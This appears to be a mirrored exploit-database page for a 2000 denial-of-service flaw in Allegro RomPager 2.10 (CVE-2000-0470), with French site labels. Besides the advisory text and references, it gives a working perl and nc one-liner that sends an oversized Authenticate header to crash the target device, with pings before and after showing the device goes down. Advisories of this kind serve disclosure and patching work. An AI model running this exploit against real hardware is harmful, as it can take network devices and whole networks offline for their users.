Skip to content
cyberexploits
doshardwaretext

Allegro RomPager 2.10 - Malformed URL Request Denial of Service

Allegro RomPager 2.10 - Malformed URL Request Denial of Service

Publié le 2000-06-01

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/dos/10237.txt7eac4c3a
raw
Allegro's RomPager is reported prone to a remote denial of service vulnerability.



If a specifically-malformed request is sent to Allegro's RomPager, it will crash, often crashing the parent device as well. In this manner, network hardware and possibly entire networks can be rendered unusable by any remote attacker using only a browser. 



CVE : CVE-2000-0470

BID : 1290

Other references : OSVDB:1371

Nessus ID : 19304



The following example is made available by Seth Alan Woolley:

$ ip_address="some.ip.add.ress"

$ ping $ip_address # works



the one-liner:

$ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$ip_address"'\r\nAuthenticate: " . 'A' x 1024 . "\r\n\r\n"' | nc "$ip_address" 80



$ ping $ip_address # doesn't work 
Voir sur GitHub